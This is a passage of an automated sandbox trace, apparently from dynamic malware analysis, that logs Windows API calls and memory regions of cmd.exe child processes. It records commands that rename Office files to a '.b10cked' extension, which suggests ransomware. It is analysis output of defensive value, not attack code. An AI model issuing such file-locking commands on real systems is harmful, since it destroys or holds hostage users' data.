lpData=0x12eb20, lpcbData=0x12eb18*=0x1000 | out: lpType=0x12eb1c*=0x4, lpData=0x12eb20*=0x1, lpcbData=0x12eb18*=0x4) returned 0x0 [0201.749] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12eb1c, lpData=0x12eb20, lpcbData=0x12eb18*=0x1000 | out: lpType=0x12eb1c*=0x0, lpData=0x12eb20*=0x1, lpcbData=0x12eb18*=0x1000) returned 0x2 [0201.749] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12eb1c, lpData=0x12eb20, lpcbData=0x12eb18*=0x1000 | out: lpType=0x12eb1c*=0x4, lpData=0x12eb20*=0x0, lpcbData=0x12eb18*=0x4) returned 0x0 [0201.749] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12eb1c, lpData=0x12eb20, lpcbData=0x12eb18*=0x1000 | out: lpType=0x12eb1c*=0x4, lpData=0x12eb20*=0x9, lpcbData=0x12eb18*=0x4) returned 0x0 [0201.749] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12eb1c, lpData=0x12eb20, lpcbData=0x12eb18*=0x1000 | out: lpType=0x12eb1c*=0x4, lpData=0x12eb20*=0x9, lpcbData=0x12eb18*=0x4) returned 0x0 [0201.749] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12eb1c, lpData=0x12eb20, lpcbData=0x12eb18*=0x1000 | out: lpType=0x12eb1c*=0x0, lpData=0x12eb20*=0x9, lpcbData=0x12eb18*=0x1000) returned 0x2 [0201.749] RegCloseKey (hKey=0x40) returned 0x0 [0201.749] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863a3 [0201.749] srand (_Seed=0x5b8863a3) [0201.749] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSPU~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSPUB.DEV.14.1033.hxn.b10cked\"" [0201.749] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSPU~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSPUB.DEV.14.1033.hxn.b10cked\"" [0201.749] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: 
lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0201.749] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2418f0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0201.750] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0201.750] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0201.750] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0201.750] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0201.750] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0201.750] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0201.750] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0201.750] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0201.750] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0201.750] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0201.750] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0201.750] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0201.750] GetEnvironmentStringsW () returned 0x2422e0* [0201.750] FreeEnvironmentStringsW (penv=0x2422e0) returned 1 [0201.750] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0201.750] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0201.750] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0201.750] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0201.750] 
_wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0201.750] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0201.750] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0201.750] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0201.750] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0201.750] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0201.750] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12f8e0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0201.750] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x12f8e0, lpFilePart=0x12f8dc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x12f8dc*="Desktop") returned 0x18 [0201.750] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0201.751] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x12f65c | out: lpFindFileData=0x12f65c) returned 0x240020 [0201.751] FindClose (in: hFindFile=0x240020 | out: hFindFile=0x240020) returned 1 [0201.751] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x12f65c | out: lpFindFileData=0x12f65c) returned 0x240020 [0201.751] FindClose (in: hFindFile=0x240020 | out: hFindFile=0x240020) returned 1 [0201.751] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x12f65c | out: lpFindFileData=0x12f65c) returned 0x240020 [0201.751] FindClose (in: hFindFile=0x240020 | out: hFindFile=0x240020) returned 1 [0201.751] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0201.751] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0201.751] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0201.751] GetEnvironmentStringsW () returned 0x242b00* 
[0201.751] FreeEnvironmentStringsW (penv=0x242b00) returned 1 [0201.751] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0201.752] GetConsoleOutputCP () returned 0x1b5 [0201.757] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0201.757] GetUserDefaultLCID () returned 0x409 [0201.763] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0201.763] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12fa20, cchData=128 | out: lpLCData="0") returned 2 [0201.763] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x12fa20, cchData=128 | out: lpLCData="0") returned 2 [0201.763] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x12fa20, cchData=128 | out: lpLCData="1") returned 2 [0201.764] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0201.764] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0201.764] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0201.764] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0201.764] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0201.764] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0201.764] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0201.764] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0201.764] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 
[0201.764] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0201.764] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0201.765] GetConsoleTitleW (in: lpConsoleTitle=0x2308e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0201.781] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0201.781] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0201.781] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0201.782] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0201.782] _wcsicmp (_String1="move", _String2=")") returned 68 [0201.782] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0201.782] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0201.782] _wcsicmp (_String1="IF", _String2="move") returned -4 [0201.782] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0201.782] _wcsicmp (_String1="REM", _String2="move") returned 5 [0201.782] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0201.785] GetConsoleTitleW (in: lpConsoleTitle=0x12f718, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0201.821] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0201.821] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0201.821] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0201.821] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0201.821] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0201.821] _wcsicmp (_String1="move", _String2="CD") returned 10 [0201.821] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0201.821] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0201.821] _wcsicmp (_String1="move", _String2="REN") returned -5 [0201.821] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0201.821] 
_wcsicmp (_String1="move", _String2="SET") returned -6 [0201.821] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0201.821] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0201.822] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0201.822] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0201.822] _wcsicmp (_String1="move", _String2="MD") returned 11 [0201.822] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0201.822] _wcsicmp (_String1="move", _String2="RD") returned -5 [0201.822] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0201.822] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0201.822] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0201.822] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0201.822] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0201.822] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0201.822] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0201.822] _wcsicmp (_String1="move", _String2="VER") returned -9 [0201.822] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0201.822] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0201.822] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0201.822] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0201.822] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0201.822] _wcsicmp (_String1="move", _String2="START") returned -6 [0201.822] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0201.822] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0201.822] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0201.823] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0201.823] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0201.823] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x12f4d4, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x12f4cc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, 
lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x12f4cc*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0201.824] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0201.824] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0201.824] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0201.824] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0201.824] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0201.824] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0201.824] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0201.824] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0201.824] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0201.824] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0201.824] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0201.824] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0201.824] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0201.824] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0201.824] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0201.824] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0201.824] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0201.824] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0201.824] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0201.824] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) 
returned -13 [0201.824] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0201.824] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0201.824] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0201.824] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0201.824] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0201.824] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0201.824] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0201.824] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0201.824] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0201.824] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0201.824] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0201.824] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0201.825] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0201.825] _wcsicmp (_String1="MSMSPU~2.HXN", _String2=".") returned 63 [0201.825] _wcsicmp (_String1="MSMSPU~2.HXN", _String2="..") returned 63 [0201.825] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSPU~2.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msmspu~2.hxn")) returned 0x2022 [0201.825] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x241e50 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0201.825] SetErrorMode (uMode=0x0) returned 0x0 [0201.825] SetErrorMode (uMode=0x1) returned 0x0 [0201.825] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSPU~2.HXN", nBufferLength=0x104, lpBuffer=0x12ee5c, lpFilePart=0x12ee44 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSPU~2.HXN", lpFilePart=0x12ee44*="MSMSPU~2.HXN") returned 0x27 [0201.825] 
SetErrorMode (uMode=0x0) returned 0x1 [0201.825] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2" (normalized: "c:\\users\\alluse~1\\micros~2")) returned 0x2012 [0201.825] _wcsicmp (_String1="MSMSPU~2.HXN", _String2=".") returned 63 [0201.825] _wcsicmp (_String1="MSMSPU~2.HXN", _String2="..") returned 63 [0201.826] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSPU~2.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msmspu~2.hxn")) returned 0x2022 [0201.826] SetErrorMode (uMode=0x0) returned 0x0 [0201.826] SetErrorMode (uMode=0x1) returned 0x0 [0201.826] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSPU~2.HXN", nBufferLength=0x104, lpBuffer=0x12f2d8, lpFilePart=0x12f070 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSPU~2.HXN", lpFilePart=0x12f070*="MSMSPU~2.HXN") returned 0x27 [0201.826] SetErrorMode (uMode=0x0) returned 0x1 [0201.826] SetErrorMode (uMode=0x0) returned 0x0 [0201.826] SetErrorMode (uMode=0x1) returned 0x0 [0201.826] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSPUB.DEV.14.1033.hxn.b10cked", nBufferLength=0x104, lpBuffer=0x12f4e0, lpFilePart=0x12f070 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSPUB.DEV.14.1033.hxn.b10cked", lpFilePart=0x12f070*="MS.MSPUB.DEV.14.1033.hxn.b10cked") returned 0x3b [0201.826] SetErrorMode (uMode=0x0) returned 0x1 [0201.826] SetLastError (dwErrCode=0x0) [0201.826] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSPUB.DEV.14.1033.hxn.b10cked" (normalized: "c:\\users\\alluse~1\\micros~2\\ms.mspub.dev.14.1033.hxn.b10cked")) returned 0xffffffff [0201.926] GetLastError () returned 0x2 [0201.926] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSPU~2.HXN", fInfoLevelId=0x1, lpFindFileData=0x12e9ec, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12e9ec) returned 0x230e88 [0201.927] FindNextFileW (in: hFindFile=0x230e88, lpFindFileData=0x12e9ec | out: 
lpFindFileData=0x12e9ec) returned 0 [0201.927] FindClose (in: hFindFile=0x230e88 | out: hFindFile=0x230e88) returned 1 [0201.927] GetLastError () returned 0x12 [0201.927] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSPU~2.HXN", fInfoLevelId=0x1, lpFindFileData=0x12e9ec, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12e9ec) returned 0x230e88 [0201.927] FindNextFileW (in: hFindFile=0x230e88, lpFindFileData=0x12e9ec | out: lpFindFileData=0x12e9ec) returned 0 [0201.927] FindClose (in: hFindFile=0x230e88 | out: hFindFile=0x230e88) returned 1 [0201.928] GetLastError () returned 0x12 [0201.928] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSPU~2.HXN", fInfoLevelId=0x1, lpFindFileData=0x241bf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x241bf0) returned 0x230e88 [0201.928] FindNextFileW (in: hFindFile=0x230e88, lpFindFileData=0x241bf0 | out: lpFindFileData=0x241bf0) returned 0 [0201.928] FindClose (in: hFindFile=0x230e88 | out: hFindFile=0x230e88) returned 1 [0201.929] GetLastError () returned 0x12 [0201.929] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSPU~2.HXN", fInfoLevelId=0x1, lpFindFileData=0x241bf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x241bf0) returned 0x230e88 [0201.929] FindNextFileW (in: hFindFile=0x230e88, lpFindFileData=0x241bf0 | out: lpFindFileData=0x241bf0) returned 0 [0201.929] FindClose (in: hFindFile=0x230e88 | out: hFindFile=0x230e88) returned 1 [0201.929] GetLastError () returned 0x12 [0201.929] _get_osfhandle (_FileHandle=2) returned 0xb [0201.929] GetFileType (hFile=0xb) returned 0x2 [0201.929] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0201.929] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x12ebbc | out: lpMode=0x12ebbc) returned 1 [0201.929] _get_osfhandle (_FileHandle=2) returned 0xb [0201.929] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, 
lpConsoleScreenBufferInfo=0x12ebf0 | out: lpConsoleScreenBufferInfo=0x12ebf0) returned 1 [0201.929] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0201.931] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x12ec30 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0201.931] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x12ec14, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x12ec14*=0x2c) returned 1 [0201.931] longjmp () [0201.931] _get_osfhandle (_FileHandle=1) returned 0x7 [0201.931] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0201.931] _get_osfhandle (_FileHandle=1) returned 0x7 [0201.931] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0201.932] _get_osfhandle (_FileHandle=0) returned 0x3 [0201.932] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0201.932] SetConsoleInputExeNameW () returned 0x1 [0201.932] GetConsoleOutputCP () returned 0x1b5 [0201.932] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0201.932] SetThreadUILanguage (LangId=0x0) returned 0x409 [0201.932] exit (_Code=1) Process: id = "469" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16a80" os_pid = "0xd20" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSMSTO~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.MSTORE.14.1033.hxn.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" 
os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 29276 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 29277 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 29278 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 29279 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 29280 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 29281 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 29282 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 29283 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 29284 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" 
filename = "" Region: id = 29285 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 29710 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 29711 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 29712 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 29713 start_va = 0x3b0000 end_va = 0x4affff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 29714 start_va = 0x650000 end_va = 0x65ffff entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 29715 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 29716 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 29717 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 29718 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 29719 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 
